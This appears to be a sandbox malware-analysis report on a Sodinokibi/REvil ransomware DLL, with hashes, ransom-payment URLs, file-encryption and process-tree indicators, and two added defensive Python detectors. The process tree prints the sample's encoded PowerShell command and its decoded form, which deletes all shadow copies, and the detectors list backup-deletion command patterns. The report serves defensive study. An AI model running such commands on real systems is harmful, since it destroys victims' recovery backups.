Analysis

- max time kernel: 150s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26-09-2024 11:39
Behavioral tasks

- behavioral1: f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll on win7-20240903-en
- behavioral2: f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll on win10v2004-20240802-en

The sections below are from the win10v2004-20240802-en run (behavioral2), as the platform and resource fields above indicate.
General

- Target: f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll
- Size: 164KB
- MD5: f849f1a918db29de3d9b6973fdcf17f6
- SHA1: 1d132bd0089d393e0df8e2ba9c70d692cc69ddb3
- SHA256: 1d7ec7dfa37ab698e6c57ce2700d113c1e781d859e8fb7c7f1a5b5ee6e85d039
- SHA512: 9aaf82a0e96afdbbe968d0747557b6672cf0d20603d84fe3352893e4a8d7c0d7f770dac64676ab84c28f16788e6923cf7f98f59709b13bad8af724b37398ab35
- SSDEEP: 3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfpL35lc/:veoUeZR2TRCWQFftpla
Malware Config

Extracted from: C:\Users\1r7k2i7-readme.txt
Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9842704CC5EE1D32
- http://decryptor.cc/9842704CC5EE1D32

The trailing path component is the same per-victim identifier on both the Tor and the clearnet payment site. The note's filename prefix (1r7k2i7) matches the 1r7k2i7-readme.txt files the sample creates next to the files it modifies (see the Program Files signature below).
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive. Every drive letter from A: to Z: except C: is opened read-only, which is how the sample discovers which volumes exist before it starts rewriting files.
- Process: rundll32.exe
- File opened (read-only): \??\J:, \??\S:, \??\V:, \??\I:, \??\M:, \??\R:, \??\D:, \??\L:, \??\N:, \??\T:, \??\U:, \??\A:, \??\B:, \??\H:, \??\K:, \??\W:, \??\X:, \??\Y:, \??\Z:, \??\Q:, \??\F:, \??\E:, \??\G:, \??\O:, \??\P:

Drops file in Program Files directory (33 IoCs)
rundll32.exe opens 31 existing files of unrelated types under c:\program files for modification, consistent with in-place encryption, and creates the ransom note 1r7k2i7-readme.txt in both c:\program files and c:\program files (x86).
- Process: rundll32.exe
- File opened for modification: \??\c:\program files\CompressStep.potx, \??\c:\program files\DisconnectInitialize.jpe, \??\c:\program files\InitializeEnable.js, \??\c:\program files\InstallRequest.m4a, \??\c:\program files\NewComplete.vssx, \??\c:\program files\NewPush.ttf, \??\c:\program files\ProtectApprove.mp2v, \??\c:\program files\ReceiveDebug.pptx, \??\c:\program files\CompleteTrace.M2TS, \??\c:\program files\ConvertToGroup.jpe, \??\c:\program files\ConvertToResume.mpp, \??\c:\program files\EditOptimize.m4a, \??\c:\program files\MeasureLock.txt, \??\c:\program files\PingAdd.dotx, \??\c:\program files\ApproveStart.wmf, \??\c:\program files\PingRead.dxf, \??\c:\program files\ResumeUnblock.gif, \??\c:\program files\AddInitialize.vstx, \??\c:\program files\ProtectConfirm.asp, \??\c:\program files\UnlockImport.emf, \??\c:\program files\CompressExport.vssm, \??\c:\program files\InvokeOut.ini, \??\c:\program files\CheckpointConvertTo.mp2, \??\c:\program files\DenyAssert.DVR, \??\c:\program files\GroupDismount.css, \??\c:\program files\MeasureConnect.dxf, \??\c:\program files\SkipPop.wvx, \??\c:\program files\ApproveResolve.ps1xml, \??\c:\program files\CloseReceive.wps, \??\c:\program files\RedoCompare.search-ms, \??\c:\program files\SkipDeny.asx
- File created: \??\c:\program files\1r7k2i7-readme.txt, \??\c:\program files (x86)\1r7k2i7-readme.txt

System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
- Process: rundll32.exe
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

Suspicious behavior: EnumeratesProcesses (4 IoCs)
- 408 rundll32.exe (2 events)
- 4692 powershell.exe (2 events)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
- SeDebugPrivilege: 408 rundll32.exe
- SeDebugPrivilege: 4692 powershell.exe
- SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege: 3736 vssvc.exe
The vssvc.exe entries are the Volume Shadow Copy service enabling its own routine privileges while it services the deletion request described under the VSS signature below; the entries worth alerting on are the SeDebugPrivilege acquisitions by rundll32.exe and its PowerShell child.

Suspicious use of WriteProcessMemory (5 IoCs)
- PID 1140 rundll32.exe wrote to memory of 408 rundll32.exe (3 events)
- PID 408 rundll32.exe wrote to memory of 4692 powershell.exe (2 events)
Both pairs are parent/child pairs from the process tree (the 64-bit rundll32.exe launching its 32-bit copy, and that copy launching PowerShell), so on this evidence alone they record process creation rather than injection into an unrelated process.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service manages backups/snapshots. Here it is driven through WMI by the PowerShell child process in the process tree: its encoded command enumerates Win32_ShadowCopy instances and deletes each one, removing the local restore points before the victim can use them. That request is what brings vssvc.exe (PID 3736) into the process tree.
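The two file-system signatures above (the drive sweep and the Program Files writes with note drops) are the raw material for a behavioural ransomware heuristic. The following is an added example, not code from the sandbox or from the malware: it parses records in the flat `File <action> \??\<path> <process>` form this report uses (sample lines copied from the signature above, plus one constructed svchost.exe line as a control) and flags any process that rewrites many files of many different types and drops a note-like file in a directory it touched. The thresholds and the note-name pattern are assumptions.

```python
"""Behavioural triage of file-system IoCs from a sandbox report.

Added example, not part of the sandbox report or of any vendor's tooling.
Parses records in the flat form the report uses and applies the classic
ransomware heuristic: one process rewriting many files of many types and
dropping a note file beside them. Thresholds and note naming are assumptions.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Sample records: a subset copied from the report's Program Files signature,
# plus one constructed svchost.exe line that should NOT be flagged.
SAMPLE_RECORDS = r"""
File opened for modification \??\c:\program files\CompressStep.potx rundll32.exe
File opened for modification \??\c:\program files\DisconnectInitialize.jpe rundll32.exe
File opened for modification \??\c:\program files\InitializeEnable.js rundll32.exe
File opened for modification \??\c:\program files\InstallRequest.m4a rundll32.exe
File opened for modification \??\c:\program files\NewComplete.vssx rundll32.exe
File created \??\c:\program files\1r7k2i7-readme.txt rundll32.exe
File opened for modification \??\c:\program files\NewPush.ttf rundll32.exe
File opened for modification \??\c:\program files\ProtectApprove.mp2v rundll32.exe
File opened for modification \??\c:\program files\ReceiveDebug.pptx rundll32.exe
File created \??\c:\program files (x86)\1r7k2i7-readme.txt rundll32.exe
File opened (read-only) \??\J: rundll32.exe
File opened for modification \??\c:\program files\Common Files\config.ini svchost.exe
"""

# "File <action> \??\<path> <process>"; the path is non-greedy so the
# trailing "<name>.exe" token is always taken as the process.
RECORD_RE = re.compile(
    r"^File (?P<action>opened for modification|created|opened \(read-only\)) "
    r"\\\?\?\\(?P<path>.+?) (?P<process>\S+\.exe)$"
)
# Assumed note naming: short random prefix + "-readme.txt" (as in 1r7k2i7-readme.txt).
NOTE_RE = re.compile(r"^[0-9a-z]{5,10}-readme\.txt$", re.IGNORECASE)


def parse_records(text):
    """Yield (action, path, process) tuples; lines that do not match are skipped."""
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            yield m.group("action"), m.group("path"), m.group("process")


def summarize(records):
    """Per-process counters: files modified, distinct extensions, notes, dirs touched."""
    stats = defaultdict(lambda: {"modified": 0, "extensions": set(), "notes": [], "dirs": set()})
    for action, path, process in records:
        p = PureWindowsPath(path)
        s = stats[process]
        if action == "opened for modification":
            s["modified"] += 1
            s["extensions"].add(p.suffix.lower())
            s["dirs"].add(str(p.parent).lower())
        elif action == "created" and NOTE_RE.match(p.name):
            s["notes"].append(str(p))
    return stats


def classify(stats, min_modified=8, min_extensions=6):
    """Return the processes whose file activity looks like encryption.

    A process is flagged when it rewrote at least `min_modified` files spanning
    at least `min_extensions` distinct extensions (an encryptor does not care
    about file type) and created a note-like file in a directory it rewrote in.
    """
    flagged = []
    for process, s in stats.items():
        many_types = len(s["extensions"]) >= min_extensions
        note_beside_files = any(
            str(PureWindowsPath(n).parent).lower() in s["dirs"] for n in s["notes"]
        )
        if s["modified"] >= min_modified and many_types and note_beside_files:
            flagged.append(process)
    return flagged


def note_prefix(stats):
    """The victim-specific prefix of the first note seen (e.g. '1r7k2i7'), or None."""
    for s in stats.values():
        for n in s["notes"]:
            return PureWindowsPath(n).name.split("-")[0]
    return None


if __name__ == "__main__":
    stats = summarize(parse_records(SAMPLE_RECORDS))
    print("flagged:", classify(stats))
    print("note prefix:", note_prefix(stats))
```

On the sample records only rundll32.exe is flagged (8 rewrites across 8 extensions, note dropped in the same directory); the svchost.exe control rewrote a single .ini and stays clean. The note prefix it extracts is the same token that names the extracted config's C:\Users\1r7k2i7-readme.txt.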
Processes

- C:\Windows\system32\rundll32.exe (PID 1140)
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 408)
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#1
    - Enumerates connected drives
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4692)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (the -e argument is base64 over UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 2152)
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 3736)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

Reading the tree: the DLL is invoked by export ordinal (",#1"). The 64-bit rundll32.exe relaunches itself from SysWOW64 because the DLL is 32-bit (the resource tags list arch:x86), so the malicious code runs in PID 408, and that is the process behind every file-system and registry IoC above. PID 408 then spawns PowerShell to delete every shadow copy through WMI. unsecapp.exe -Embedding is the WMI asynchronous-callback sink started by COM (the -Embedding switch is what COM passes to out-of-process servers) and vssvc.exe is the Volume Shadow Copy service started to serve that deletion; both are Windows components from system32, not dropped binaries.
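The PowerShell child in the tree above is where the restore points are destroyed. `powershell -e` takes base64 over UTF-16LE, so decoding the blob as UTF-8 yields garbage and a detection that only looks at the raw command line never sees "Win32_Shadowcopy". The following added example (not code from the sandbox or from the malware) decodes the blob exactly as it appears in the report, then runs the same check over a constructed set of process-creation events that mirror the tree (PIDs and image paths are from the report; the event field layout and the None parent for top-level processes are assumptions) so that each hit is reported together with the parent that launched it.

```python
"""Decode `powershell -EncodedCommand` payloads and flag shadow-copy deletion.

Added example; not code from the sandbox or from the malware. The encoded blob
is copied from the report's process tree. The process-creation events are
constructed to mirror that tree: PIDs and image paths come from the report, the
field layout and the None parent for top-level processes are assumptions.
"""
import base64
import re

# Copied from the report: the argument to `powershell -e` in PID 4692.
ENCODED = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMA"
    "bwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUA"
    "bABlAHQAZQAoACkAOwB9AA=="
)

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec,
# -en, -enc, -encoded, -encodedcommand); the blob that follows is base64 of
# the UTF-16LE script text, not of UTF-8.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Three common ways to remove restore points: WMI (this sample), vssadmin, wmic.
SHADOW_PATTERNS = [
    re.compile(r"Win32_ShadowCopy", re.IGNORECASE),
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]


def decode_encoded_command(blob):
    """Turn a -EncodedCommand blob back into script text (UTF-16LE, not UTF-8)."""
    return base64.b64decode(blob).decode("utf-16-le")


def effective_command(cmdline):
    """Return the script PowerShell will actually run for this command line.

    An encoded payload is decoded; a blob that fails to decode (bad padding,
    odd byte count) leaves the original command line in place so the caller
    still has something to match on.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return cmdline


def shadow_copy_tampering(cmdline):
    """True when the (decoded) command line deletes volume shadow copies."""
    text = effective_command(cmdline)
    return any(p.search(text) for p in SHADOW_PATTERNS)


# Constructed events mirroring the report's process tree (see module docstring).
EVENTS = [
    {"pid": 1140, "ppid": None, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#1"},
    {"pid": 408, "ppid": 1140, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#1"},
    {"pid": 4692, "ppid": 408,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -e " + ENCODED},
    {"pid": 2152, "ppid": None, "image": r"C:\Windows\system32\wbem\unsecapp.exe",
     "cmdline": r"C:\Windows\system32\wbem\unsecapp.exe -Embedding"},
    {"pid": 3736, "ppid": None, "image": r"C:\Windows\system32\vssvc.exe",
     "cmdline": r"C:\Windows\system32\vssvc.exe"},
]


def find_shadow_copy_deleters(events):
    """Return (pid, parent image, decoded command) for every shadow-copy deleter.

    Resolving the parent matters for triage: PowerShell deleting shadow copies
    from an administrator's console is one thing, from rundll32.exe it is
    ransomware.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if shadow_copy_tampering(e["cmdline"]):
            parent = by_pid.get(e["ppid"])
            hits.append((e["pid"], parent["image"] if parent else None,
                         effective_command(e["cmdline"])))
    return hits


if __name__ == "__main__":
    for pid, parent, cmd in find_shadow_copy_deleters(EVENTS):
        print(f"PID {pid} spawned by {parent}: {cmd}")
```

Against the constructed events the only hit is PID 4692, reported with its parent C:\Windows\SysWOW64\rundll32.exe and the decoded `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`; the `-ExecutionPolicy` style flags that also begin with `-e` are not mistaken for an encoded payload.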
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 6KB
  - MD5: fc6f208c83b218e5efb211f81f09ef0c
  - SHA1: aa469e87a9d64516e62766bbc462c20bb5fa30a0
  - SHA256: 70acb615032acb43d577fa3753dda4af26227c5cf8eabbc21de4d19d16536085
  - SHA512: df39e01ecd5888695d4a2a758a59cd084639489287bfdc324baeb2efc78e96f2e5221119ef468789941268c30b0c909ff98560b5a12ccb4b74cb7d6e71857736
- Filesize: 60B
  - MD5: d17fe0a3f47be24a6453e9ef58c94641
  - SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  - SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  - SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82